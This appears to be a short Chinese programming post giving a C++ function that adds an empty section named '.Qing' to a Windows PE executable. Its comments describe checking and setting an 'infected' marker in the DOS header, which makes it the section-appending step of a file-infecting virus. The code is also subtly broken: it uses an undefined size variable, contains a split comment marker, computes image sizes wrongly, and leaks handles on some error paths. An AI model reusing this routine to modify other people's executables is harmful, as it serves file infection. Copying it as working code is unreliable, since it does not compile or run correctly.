话说PE增加区段......
//********************************************** // Method: AddEmptySection // Returns: BOOL // Parameter: PCTSTR ptFile 要添加空节的文件路径 // Parameter: UINT uSize 空节的大小 //********************************************** BOOL AddEmptySection(PCTSTR ptFile,UINT uSize) { HANDLE hFile = NULL; HANDLE hMapping = NULL; LPVOID bPointer = NULL; PBYTE pData = NULL; // 打开源文件 hFile = CreateFile( ptFile, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL); if (hFile == INVALID_HANDLE_VALUE) return FALSE; //内存映射,创建一个有名的共享内存 if (!(hMapping = CreateFileMapping(hFile, 0, PAGE_READWRITE | SEC_COMMIT, 0, dwSize, NULL))) { CloseHandle(hFile); return FALSE; } //映射对象视图,进行读写操作 if (!(bPointer = MapViewOfFile(hMapping, FILE_MAP_ALL_ACCESS, 0, 0, dwSize))) { CloseHandle(hMapping); CloseHandle(hFile); return FALSE; } pData = (PBYTE)bPointer; //检查 DOS特征 if (((PIMAGE_DOS_HEADER) pData)->e_magic != IMAGE_DOS_SIGNATURE) { return FALSE; } / /检查文件是否被感染过 if( *(DWORD*)(((PIMAGE_DOS_HEADER) pData)->e_res2) == 19861001) { //已感染,跳过 UnmapViewOfFile(bPointer); CloseHandle(hMapping); CloseHandle(hFile); return FALSE; } else { //设置感染标志 *(DWORD*)(((PIMAGE_DOS_HEADER) pData)->e_res2) = 19861001; } //检查 PE 特征 PIMAGE_NT_HEADERS pNTHdr = (PIMAGE_NT_HEADERS) (pData + ((PIMAGE_DOS_HEADER) bPointer)->e_lfanew); if (pNTHdr->Signature != IMAGE_NT_SIGNATURE) return FALSE; // 检查节头(节描述)空间 if ((pNTHdr->FileHeader.NumberOfSections + 1) * sizeof(IMAGE_SECTION_HEADER) > pNTHdr->OptionalHeader.SizeOfHeaders) return FALSE; // Calculate code and file delta DWORD uCodeDelta = ZALIGN(uSize, pNTHdr->OptionalHeader.SectionAlignment); DWORD dwFileDelta = ZALIGN(uSize, pNTHdr->OptionalHeader.FileAlignment); // 获得新节头 和前一个节头 PIMAGE_SECTION_HEADER pNewSec = (PIMAGE_SECTION_HEADER) (pNTHdr + 1) + pNTHdr->FileHeader.NumberOfSections; PIMAGE_SECTION_HEADER pLastSec = pNewSec - 1; //这里是填充新节头 memcpy(pNewSec->Name, ".Qing", 6); pNewSec->VirtualAddress = pLastSec->VirtualAddress + ZALIGN(pLastSec->Misc.VirtualSize, pNTHdr->OptionalHeader.SectionAlignment); pNewSec->PointerToRawData = pLastSec->PointerToRawData + pLastSec->SizeOfRawData; pNewSec->Misc.VirtualSize = uSize; pNewSec->SizeOfRawData = 0;//uCodeDelta; pNewSec->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE ;//节属性 // 修改下IMAGE_NT_HEADERS,增加新节 pNTHdr->FileHeader.NumberOfSections++; pNTHdr->OptionalHeader.SizeOfCode += uCodeDelta; pNTHdr->OptionalHeader.SizeOfImage += dwFileDelta; // pNTHdr->OptionalHeader.AddressOfEntryPoint;//no change here pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0; pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0; UnmapViewOfFile(bPointer); //解除映射 CloseHandle(hMapping); CloseHandle(hFile); return TRUE; } |